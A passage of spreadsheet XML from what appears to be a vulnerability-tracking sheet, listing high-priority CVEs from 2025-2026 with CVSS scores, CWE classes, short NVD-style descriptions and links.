      <c r="D696" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="inlineStr"/>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L696" s="5" t="inlineStr">
        <is>
          <t>In the jose package before 0.11.0 for OCaml, library calls to validate an RSA signature only confirm that PKCS #1 decoding succeeds, and proceed to declare the signature valid without the required steps that involve the public key.</t>
        </is>
      </c>
      <c r="M696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89086</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-54603</t>
        </is>
      </c>
      <c r="C697" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D697" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr">
        <is>
          <t>2025-10-14</t>
        </is>
      </c>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L697" s="5" t="inlineStr">
        <is>
          <t>An incorrect OIDC authentication flow in Claroty Secure Access 3.3.0 through 4.0.2 can result in unauthorized user creation or impersonation of existing OIDC users.</t>
        </is>
      </c>
      <c r="M697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-54603</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10090</t>
        </is>
      </c>
      <c r="C698" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D698" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G698" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr">
        <is>
          <t>CWE-267</t>
        </is>
      </c>
      <c r="L698" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Application Subscription controller (multicluster-operators-subscription) of Red Hat Advanced Cluster Management for Kubernetes (ACM). A user with namespace-scoped "edit" privileges in an ACM hub namespace can create a Channel resource pointing to a Helm repository they control and a Subscription resource referencing it. The app-subscription controller fetches and applies the Helm chart contents with its own elevated authority, without verifying whether the subscription creator holds the "open-cluster-management:subscription-admin" role and without restricting applied resources to the subscription namespace. This allows the attacker to include cluster-scoped resources in the Helm chart, such as a ClusterRoleBinding granting the attacker's ServiceAccount the "cluster-admin" ClusterRole. Successful exploitation results in full cluster-admin privilege escalation. This contradicts the ACM documentation which states that non-subscription-admin users should have resources deployed into the subscription namespace only.</t>
        </is>
      </c>
      <c r="M698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10090</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53581</t>
        </is>
      </c>
      <c r="C699" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D699" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L699" s="5" t="inlineStr">
        <is>
          <t>OPNsense is a FreeBSD based firewall and routing platform. Prior to version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core, a path traversal vulnerability in the NTP configuration module allows an attacker to overwrite arbitrary files on the system as the root user. By manipulating the GPS or PPS serial port parameter, an attacker with access to the NTP configuration can escape the intended directory and force the system to write user-controlled data to any file on the filesystem. Version 26.1.9 of opnsense/core and version 26.4_20 of BE/opnsense/core patch the issue.</t>
        </is>
      </c>
      <c r="M699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62988</t>
        </is>
      </c>
      <c r="C700" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D700" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J700" s="5" t="inlineStr"/>
      <c r="K700" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L700" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. From 2.3.7 until 2.3.8, the Customers.get, Customers.listing, Admins.get, Admins.listing, Ftps.get, and Ftps.listing API commands in lib/Froxlor/Api/Commands/Customers.php, lib/Froxlor/Api/Commands/Admins.php, and lib/Froxlor/Api/Commands/Ftps.php retrieve full database rows and return them without removing password and data_2fa fields. An authenticated API caller with permission to use these endpoints can obtain customer, administrator, and FTP password hashes as well as Base32-encoded TOTP seeds for administrator and customer accounts. Password hashes can be cracked offline, and TOTP seeds can generate valid second-factor codes until two-factor authentication is reset. Exposure of both values for an account can enable takeover of the hosting panel or hosted resources and can defeat both authentication factors. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62988</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="C701" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D701" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G701" s="5" t="inlineStr">
        <is>
          <t>java, sap</t>
        </is>
      </c>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L701" s="5" t="inlineStr">
        <is>
          <t>SAP GUI for Java does not correctly enforce the trust level policy for certain functions invoked from a connected backend system. A low-privileged attacker could exploit this weakness by manipulating a connected backend system to trigger affected functionality. This could allow arbitrary command execution on the victim's machine, leading to a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="M701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67403</t>
        </is>
      </c>
      <c r="C702" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D702" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L702" s="5" t="inlineStr">
        <is>
          <t>Cash Collect contains an improper authorization vulnerability in the Sage AR Automation API. Insufficient tenant-level authorization checks allow authenticated users to access administrative resources belonging to other tenants by specifying a valid non predictable tenant identifier.</t>
        </is>
      </c>
      <c r="M702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67403</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68484</t>
        </is>
      </c>
      <c r="C703" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D703" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L703" s="5" t="inlineStr">
        <is>
          <t>Cash Collect contains an improper authorization vulnerability in the Sage AR Automation API. Administrative functions do not properly verify user privileges, allowing authenticated low-privileged users to create administrator accounts and obtain elevated privileges.</t>
        </is>
      </c>
      <c r="M703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68484</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69251</t>
        </is>
      </c>
      <c r="C704" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D704" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G704" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L704" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise record manager and agent memory nodes allowed users to set arbitrary TypeORM DataSource options through the additionalConfig input in packages/components/nodes/recordmanager/MySQLRecordManager/MySQLrecordManager.ts, packages/components/nodes/recordmanager/PostgresRecordManager/PostgresRecordManager.ts, packages/components/nodes/recordmanager/SQLiteRecordManager/SQLiteRecordManager.ts, packages/components/nodes/memory/AgentMemory/MySQLAgentMemory/MySQLAgentMemory.ts, and packages/components/nodes/memory/AgentMemory/AgentMemory.ts. TypeORM DataSource options such as entities, subscribers, and migrations can load local JavaScript files, allowing an authenticated user to execute arbitrary code on the server by uploading a JavaScript payload and referencing it from additionalConfig.entities. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69251</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69253</t>
        </is>
      </c>
      <c r="C705" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D705" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G705" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L705" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to version 3.1.3, several custom-tool components — AgentAsTool, ChatflowTool, and ExecuteFlow — ran code in the in-process  vm2  sandbox. To build that code, they inserted a user-controlled  baseURL  value straight into the JavaScript source, for example  const url = "${baseURL}/..."; . The only check on  baseURL  was  isValidURL , but a valid-looking URL can still contain characters that break out of a code string. An authenticated user could craft a  baseURL  that passed this check, closed the surrounding string, and injected their own JavaScript into the sandboxed script (code injection, CWE-94). The  vm2  sandbox runs in the same Node.js process as Flowise and exposes risky dependencies. As a result, the injected code could escape the sandbox and run arbitrary code on the Flowise server as the Flowise process user. Exploitation only requires an authenticated session. The issue is fixed in version 3.1.3, which passes the URL to the sandbox as data instead of inserting it into code and adds stricter URL validation.</t>
        </is>
      </c>
      <c r="M705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69253</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="C706" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D706" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G706" s="5" t="inlineStr">
        <is>
          <t>spring, azure</t>
        </is>
      </c>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L706" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71851</t>
        </is>
      </c>
      <c r="C707" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D707" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G707" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr">
        <is>
          <t>CWE-331, CWE-334, CWE-338</t>
        </is>
      </c>
      <c r="L707" s="5" t="inlineStr">
        <is>
          <t>crypto-js is a JavaScript library of crypto standards. Versions of crypto-js prior to 4.0.0 generate randomness in CryptoJS.lib.WordArray.random() using a custom variation of the Multiply-With-Carry pseudorandom number generator, seeded from Math.random(), instead of a cryptographically secure source. This generator was introduced in version 3.1.2-4 and remained present in nearly every 3.x release. Nominal requests for 128 or 256 bits of entropy through this function produce effective search spaces of approximately 2 to the 39th and 2 to the 47th possibilities, small enough to enumerate on commodity hardware. Downstream wallet applications that used CryptoJS.lib.WordArray.random() as the entropy source for BIP39 recovery phrases are affected, and an attacker who enumerates the reduced output space can recover the resulting private keys and control the associated funds. This issue is fixed in version 4.0.0.</t>
        </is>
      </c>
      <c r="M707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71851</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73302</t>
        </is>
      </c>
      <c r="C708" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D708" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L708" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.39.30, the OIDC flow in packages/backend-core/src/middleware/passport/sso/oidc.ts resolved an email without getEmailVerified or an email_verified requirement, and packages/backend-core/src/middleware/passport/sso/sso.ts then used users.getGlobalUserByEmail as a fallback account-linking key. An attacker who can authenticate through a configured identity provider that asserts a victim email as unverified can have a fresh provider identity merged into the victim Budibase account and inherit the victim roles. This issue is fixed in version 3.39.30.</t>
        </is>
      </c>
      <c r="M708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73302</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73407</t>
        </is>
      </c>
      <c r="C709" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D709" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L709" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.1, RestIntegration._req in packages/server/src/integrations/rest.ts attached credentials from getAuthHeaders and defaultHeaders without requiring the final request destination to match the datasource origin. An unauthenticated caller of a PUBLIC POST /api/v2/queries/:queryId query could supply an absolute or parameterized path to an attacker-controlled host and receive the stored bearer, basic, or static-header credentials. This issue is fixed in version 3.40.1.</t>
        </is>
      </c>
      <c r="M709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73407</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73842</t>
        </is>
      </c>
      <c r="C710" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D710" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G710" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J710" s="5" t="inlineStr"/>
      <c r="K710" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L710" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.3, 1.1.3, and 1.2.0-rc.2, internal/cluster-gateway/server.go exposed /api/proxy/, /api/exec/, and /api/wirelogs/ on an internal listener without requiring a client certificate or token, allowing any network-reachable caller to read tenant Kubernetes Secrets, mutate workloads, and execute commands across connected data planes. This issue is fixed in versions 1.0.3, 1.1.3, and 1.2.0-rc.2.</t>
        </is>
      </c>
      <c r="M710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73842</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75604</t>
        </is>
      </c>
      <c r="C711" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D711" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G711" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L711" s="5" t="inlineStr">
        <is>
          <t>Next.js is a React framework for building full-stack web applications. From 13.4.0 until 15.5.24 and 16.3.3, Next.js applications using Pages Router or App Router without Cache Components on Windows-hosted servers do not consistently escape backslashes in route segments before constructing incremental-cache paths. In packages/next/src/shared/lib/router/utils/escape-path-delimiters.ts and packages/next/src/server/lib/incremental-cache/file-system-cache.ts, a remote request can supply encoded Windows path separators that traverse outside the intended cache root and expose private build data, including the server-reference-manifest encryption key. Disclosure of that key can enable remote code execution in the affected application. This issue is fixed in versions 15.5.24 and 16.3.3.</t>
        </is>
      </c>
      <c r="M711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82021</t>
        </is>
      </c>
      <c r="C712" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D712" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L712" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.18.2 prior to 0.19.0 contains a supply chain vulnerability in its bundled MCP catalog that allows a remote attacker to execute arbitrary code by compromising a third-party upstream repository referenced via a mutable branch rather than a pinned commit SHA. An attacker who compromises the upstream repository can propagate malicious code to every host that installs the affected catalog entry, with no further action required by the operator.</t>
        </is>
      </c>
      <c r="M712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82021</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85982</t>
        </is>
      </c>
      <c r="C713" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D713" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L713" s="5" t="inlineStr">
        <is>
          <t>The Auth0 AD/LDAP Connector is vulnerable to stored Cross-Site Scripting (XSS) issues due to improper HTML encoding of data in search results and updater log content displayed in the admin panel. An authenticated user with privileges to modify directory attributes, or a low-privileged local user on the host where the connector is installed, could insert script content. This script content could then execute in an administrator's browser when they view the affected search results or update logs.</t>
        </is>
      </c>
      <c r="M713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86259</t>
        </is>
      </c>
      <c r="C714" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D714" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-918</t>
        </is>
      </c>
      <c r="L714" s="5" t="inlineStr">
        <is>
          <t>OpenMAIC before 1.0.1 skips server-side request forgery validation in non-production builds, allowing unauthenticated attackers to reach cloud instance metadata services. Attackers can supply arbitrary provider URLs via the x-base-url header or baseUrl parameter to access sensitive cloud credentials and metadata.</t>
        </is>
      </c>
      <c r="M714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86259</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87613</t>
        </is>
      </c>
      <c r="C715" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D715" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I715" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L715" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87613</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87911</t>
        </is>
      </c>
      <c r="C716" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D716" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G716" s="5" t="inlineStr">
        <is>
          <t>postgresql, aws</t>
        </is>
      </c>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J716" s="5" t="inlineStr"/>
